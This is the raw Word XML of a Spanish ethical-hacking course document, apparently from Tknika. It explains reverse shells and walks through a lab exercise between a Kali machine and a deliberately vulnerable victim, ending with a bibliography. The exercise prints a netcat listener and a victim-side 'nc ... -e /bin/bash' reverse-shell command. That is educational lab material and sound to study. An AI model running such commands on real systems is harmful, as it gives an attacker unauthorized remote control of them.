          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bind shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>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-471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>255659</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400675" cy="1299566"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapSquare wrapText="bothSides" distB="114300" distT="114300" distL="114300" distR="114300"/>
            <wp:docPr id="139" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="55266"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400675" cy="1299566"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">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Una </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una técnica en la que un atacante utiliza una conexión de red inversa para obtener acceso a un sistema remoto. En lugar de conectarse desde el sistema atacante al sistema objetivo, se establece una conexión desde el sistema objetivo al atacante. Una vez establecida la conexión, el atacante puede acceder y controlar el sistema objetivo de manera remota.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">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Vamos a hacer ahora una reverse shell entre la máquina KALI y otra con IP</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10.10.10.222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; es decir, abriremos el listener en el equipo atacante (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) e iniciaremos la conexión a él desde la víctima (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">indefensometa3</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90">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En </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, ejecutaremos este comando: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">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nc -lp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5400675" cy="339928"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="140" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="87778" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400675" cy="33992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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">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En </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">la víctima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nc 10.10.10.222 4444 -e  /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="203200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13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39973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Una vez establecida la conexión, vemos que en la máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">podemos ejecutar un comando remotamente y ver la salida de éste. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5399730" cy="2438400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="145" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="12101"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="539973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360" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.ohp0kqufbaj8" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8m7hrgahhyly" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bibliografía</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="566.9291338582675"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HERRERO PÉREZ, L. (2022). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hacking ético.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Madrid</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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ra-Ma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="566.9291338582675"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GONZÁLEZ PÉREZ, P, SÁNCHEZ GARCÉS, G. y SORIANO de la CÁMARA, J.M. (2020). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pentesting con Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Madrid. 0xWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="566.9291338582675"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GONZÁLEZ PÉREZ, P. (2020). </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ethical Hacking</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Madrid. 0xWORD. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Un informático en el lado del mal. </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.elladodelmal.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:hyperlink r:id="rId36">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Metasploitable-2-exploitability-guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A2">
      <w:pPr>
        <w:spacing w:after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2555266" cy="1187264"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="155" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2555266" cy="118726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firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2535936" cy="768096"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="157" name="image10.jpg"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image10.jpg"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2535936" cy="768096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="54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Verdana"/>
  <w:font w:name="Courier New"/>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center"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="2535936" cy="768096"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="141"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2535936" cy="76809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center"/>
      <w:rPr>
        <w:color w:val="00000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center"/>
      <w:rPr>
        <w:color w:val="00000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rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="5400040" cy="265242"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="142" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image11.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5400040" cy="26524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right"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="4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right"/>
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="4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spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Zamalbide Auzoa z/g - 20100 Errenteria (Gipuzkoa) - T. (+34) 943 082 900 - info@tknika.eus – </w:t>
    </w:r>
  </w:p>
